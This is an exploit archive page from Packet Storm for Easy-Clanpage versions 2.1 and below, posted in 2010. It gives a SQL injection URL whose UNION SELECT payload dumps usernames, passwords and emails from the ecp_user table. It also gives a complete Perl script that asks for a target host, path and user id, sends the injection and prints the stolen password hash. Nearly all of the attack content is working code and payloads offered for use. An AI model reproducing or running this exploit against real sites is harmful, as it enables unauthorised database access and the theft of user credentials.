what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Easy-Clanpage 2.1 SQL Injection

Easy-Clanpage 2.1 SQL Injection
Posted Mar 31, 2010
Authored by Easy Laster

Easy-Clanpage versions 2.1 and below remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 00abf214a2df6c555afb504450f6c620c218e4d16b4a864626ff7f161a992944

Easy-Clanpage 2.1 SQL Injection

Change Mirror Download
----------------------------Information------------------------------------------------
+Name : Easy-Clanpage <= v2.1 SQL Injection Exploit
+Autor : Easy Laster
+Date : 30.03.2010
+Script Easy-Clanpage <= v2.1
+Demo : http://cowas-clan.de
+Download : Update Version 2.01->2.1 http://www.easy-clanpage.de
/?section=downloads&action=viewdl&id=16
+Price : for free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.

---------------------------------------------------------------------------------------

___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id=


#SQL Injection
+Exploitable : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id=1
+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+ecp_user
+where+userid=1--
-----------------------------------------------------------------------------------------

+Exploit

#!usr\bin\perl
#
#
##################################################
# Modules #
#------------------------------------------------#
use strict; # Better coding. #
use warnings; # Useful warnings. #
use LWP::Simple; # procedureal interface#
##################################################
print "
##################################################
# 4004-Security-Project #
##################################################
# Easy-Clanpage <= v2.1 SQL Injection #
# Exploit #
# Using Host+Path+Userid #
# www.demo.de /easyclanpage/ 1 #
# Easy Laster #
##################################################
\a\n";
my($host,$path,$userid,$request);
my($first,$block,$error,$dir);
$block = "
##################################################\n";
$error = "Exploit failed";
print "$block";
print q(Target www.demo.de->);
chomp($host =<STDIN>);
if ($host eq""){
die "$error\a\n"};
print "$block";
print q(Path /path/ ->);
chomp($path =<STDIN>);
if ($path eq""){
die "$error\a\n";}
print "$block";
print q(userid->);
chomp($userid =<STDIN>);
if ($userid eq""){
die "$error\a\n";}
print "$block";
$dir = "?section=gallery&action=kate&id=";
print "<~> Exploiting...\n";
$host = "http://".$host.$path;
print "<~> Connecting...\n";
$request = get($host.$dir."1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,password),4,5,6,7+from+ecp_user+where+userid=".$userid."--");
$first = rindex($request,"#####");
if ($first != -1)
{
print "<~> Exploiting...\n";
print "$block\n";
$request = substr($request, $first+5, 32);
print "<~> Hash = $request\n\r\n\a";
}
else
{
print "<~> $error";
}
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close